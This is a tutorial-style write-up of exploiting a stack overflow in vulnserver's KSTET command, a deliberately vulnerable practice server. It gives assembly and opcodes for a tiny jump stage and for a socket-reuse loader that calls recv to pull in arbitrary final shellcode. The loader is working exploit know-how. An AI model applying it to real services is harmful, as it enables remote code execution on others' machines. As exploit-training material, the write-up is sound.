The purpose of writing this up was only to present a little trick I came up with while playing with vulnserver's (http://www.thegreycorner.com/2010/12/introducing-vulnserver.html) KSTET command (one of many protocol commands vulnerable to some sort of memory corruption bug). In spite of the hardcoded addresses, 32-bitness and general lazyness, this technique should as well work in more modern conditions.

After hijacking EIP it turned out there was too little space, both above and below the overwritten saved RET, to store an actual windows shellcode (at least 250 bytes or more) that could run a reverse shell, create a user or run an executable from a publicly accessible SMB share.

Also, it did not seem to be possible to split the exploitation into two phases and first deliver the shellcode somewhere else into memory and then only use an egghunter (70 bytes to store the payload, enough for a 31-byte egghunter, not enough for the second-stage shellcode)... so I got inspired by a xpn's solution to the ROP primer level 0 (https://blog.xpnsec.com/rop-primer-level-0/) where the final shellcode was read onto the stack from stdin by calling read().

Having only about 70 bytes of space, I decided to locate the current server socket descriptor and call recv on it, reading the final stage shellcode onto the stack and then execute it. This write up describes this process in detail.

Controlling the execution

Below is the initial skeleton of a typical exploit for such an overflow. We control 70 bytes above the saved RET, then the saved RET itself ("AAAA"). Then we stuff 500 bytes of trash, where in the final version we'd like to put our shellcode, so we could easily jump to it by overwriting the saved RET with an address of a "JMP ESP" instruction (or something along these lines):

Once the crash occurs, we can see that we only control first 20 bytes after the saved RET, the rest of the payload is ignored:

So, we're going to use the first 20 bytes below the saved RET as our first stage shellcode, only to jump to the 70 bytes above the saved RET, which will be our second stage. The second stage, in turn, will download the final (third) stage shellcode and execute it.

First, we search for a "JMP ESP" instruction so we can jump to the first stage.

A convenient way to do so is to use mona, searching for the JMP ESP opcode:

!mona find -s "\xff\xe4"

We pick an address that does not contain NULL characters, preferably from a module that is using the least number of safety features as possible (essfunc.dll is a perfect candidate):

The addresses will most likely differ on your system.

0x625011af will be used for the rest of this proof of concept.

We toggle a breakpoint at it, so we can easily proceed from here in developing the further stages of the shellcode:

Now our PoC looks as follows (we used 20 NOPs as a holder for the first stage):

We run the PoC and hit the breakpoint:

Once we do a step (F7), we can see the execution flow is redirected to the 20-byte NOP space, where our first stage will be located (so far, so good).

At the top we can see the second stage buffer, at bottom we can see the first stage buffer. In between there is the overwritten RET pointer, currently pointing to the JMP ESP instruction that lead us here:

First stage shellcode

We want our first stage shellcode to jump to the start of the second stage shellcode (there is not much more we can do at this point on the only 20 bytes we control).

As we know EIP is equal to our ESP, as we just did a JMP ESP, we don't need to retrieve the current EIP in order to change it. Instead, we simply copy our current ESP to a register of choice, subtract 70 bytes from it and perform a JMP to it:

PUSH ESP ; we PUSH the stack pointer to the stack
POP EDX ; we pop it back from the stack to EDX
SUB EDX,46 ; we subtract 70 from it, pointing at the beginning of the buffer for the second stage shellcode
JMP EDX ; we JMP to it

OllyDbg/Immunity Debugger allow assembling instructions inline while debugging (just hit space to edit), which is very handy in converting our assembly to opcode without the need of using additional tools like nasmshell or nasm itself:

So, our second stage is simply

\x54\x5A\x83\xEA\x46\xFF\xE2

Also, for the time of development, for our convenience, we can prepend it with an inline breakpoint \xCC instruction, as Immunity loses the breakpoint set on the initial JMP ESP with every restart. Just remember to remove the \xCC/replace it with a NOP in the final exploit, otherwise it will cause an unhandled exception leading to a crash!

At this stage, our POC looks as follows (NOPs in the first stage were only added for visibility, they won't ever get executed). Also, the holder for the second stage was filled with NOPs as well:

As we can see, the first stage does its job, moving the execution flow to the second stage:

Second stage shellcode

Now, this is where the fun begins. As mentioned before, we want to use the existing server application's socket descriptor and call WS2_32.recv on it, so we can read as much data from it as we want, writing it to a location we want and then jump to it - or even better, write it to a suitable location so the execution flow slides to it naturally.

First, we find the place in code where the original WS2_32.recv is issued, so we can see how that takes place (e.g. what is its address and how arguments are passed, where to find them and so on).

Luckily, the section is not far away from the executable's entry point (the first instruction program executes, also the first instruction we are at once we start it in the debugger):

As we scroll down we can see we are getting somewhere:

And here we go:

We toggle a breakpoint, restart the application, make a new client connection and send something to the server. The breakpoint is hit and we can see the stack:

The part that got our interest:

00FAF9E0 00000058 |Socket = 58
00FAF9E4 003A3CA0 |Buffer = 003A3CA0
00FAF9E8 00001000 |BufSize = 1000 (4096.)
00FAF9EC 00000000 |Flags =

Also (an Immunity/OllyDbg tip); if we hit space on the actual CALL instruction where our current breakpoint is, we can see the actual address of the instruction called (we will need this later):

Now we can compare the current stack pointer at the time of our execution hijack with the one recorded while the orignal WS2_32.recv was done. We are hoping to estimate the offset between the current stack pointer and the location of the socket descriptor, so we culd use it again in our third stage.

As it turns out, the stack we are currently using points to the same location, which means the copy of the socket descriptor identifier used by the original recv() has been overwritten with further stack operations and the overflow itself:

Hoping to find a copy of it, we search the stack for its current value.

Right click on the CPU window - which represents the stack at the moment -> search for -> binary string -> 00 00 00 58 (the identifier of the socket at the time of developing, but we don't want to hardcode it as it would normally differ between systems and instances, hence the hassle to retrieve it dynamically).

We find another copy on the stack (00F2F969):

We calculate the offset between the location of the socket descriptor id copy and the current stack pointer at the time our second stage shellcode starts (119 DEC). This way we'll be able to dynamically retrieve the ID in our second stage shellcode.

Also, there is one more problem we need to solve. Once we start executing our second stage, our EIP is slightly lower than the current ESP.

As the execution proceeds, the EIP will keep going towards upper values, while the ESP is expected to keep going towards lower values (here comes the Paint):

Also, we want to write the final stage shellcode on the stack, right below the second stage, so the execution goes directly to it, without the need to jump, as illustrated below:

Hence, once we have all the info needed to call WS2_32.recv(), we'll need to move the stack pointer above the current area of operation (by subtracting from it) to avoid any interference with the shellcode stage instructions:

So, the shellcode goes like this:

PUSH ESP
POP ECX ; we simply copy ESP to ECX, so we can make the calculation needed to fetch the socket descriptor id
SUB CL,74 ; SUB 119 (DEC) from CL - now ECX points at the socket descriptor ID, which is what we need to pass to WS2_32.recv
SUB ESP,50 ; We have to move the current stack pointer above the second stage shellcode (above the current EIP), otherwise we would make it cripple itself with any stack operations performed by WS2_32.recv we are going to call, also this way we will avoid any collision with the buffer we are going to use for our final stage shellcode. From this point we don't have to worry about it anymore.
XOR EDX,EDX ; zero EDX (the flags argument for recv),
PUSH EDX ; we push our first argument to the stack, as arguments are passed via stack here
ADD DH,2 ; now we we turn EDX into 512 by adding 2 to DH
PUSH EDX ; we push it to the stack (BufSize, the second argument)
; retrieve the current value of ESP to EBX
PUSH ESP
POP EBX
; increment it by 0x50 (this value was adjusted manually after experimentig a bit), so it points slightly below our current EIP
ADD EBX,50 ; this is the beginning of the buffer where the third stage will be written
PUSH EBX ; push the pointer to the buffer on the stack (third argument)
; now, the last argument - the socket descriptor - we push the value pointed by ECX to the stack:
PUSH DWORD PTR DS:[ECX]

So, we are almost done.

Now we have to call the WS2_32.recv() function the same way the original server logic does. We take the address used by the original CALL instruction (0040252C - as it was emphasized we would need it later).

The problem we need to deal with is the fact the address starts with a NULL byte - which we cannot use in our shellcode.

So, to get round this, we are going to use a slightly modified version of it, e.g. 40252C11, and then perform a shift 8 bits to the right. This way the least significant byte will vanish, while a null byte becomes the new most significant byte (SHR(40252C11) => 0040252C):

MOV EAX,40252C11
SHR EAX,8
CALL EAX

Our full PoC looks as follows:

The stack during the execution of the second stage right before the third stage is delivered:

The stack right after the return from WS2_32.recv():

Yup, full of garbage we control:

Now we can replace the 500 "\xCC" with our favorite shellcode.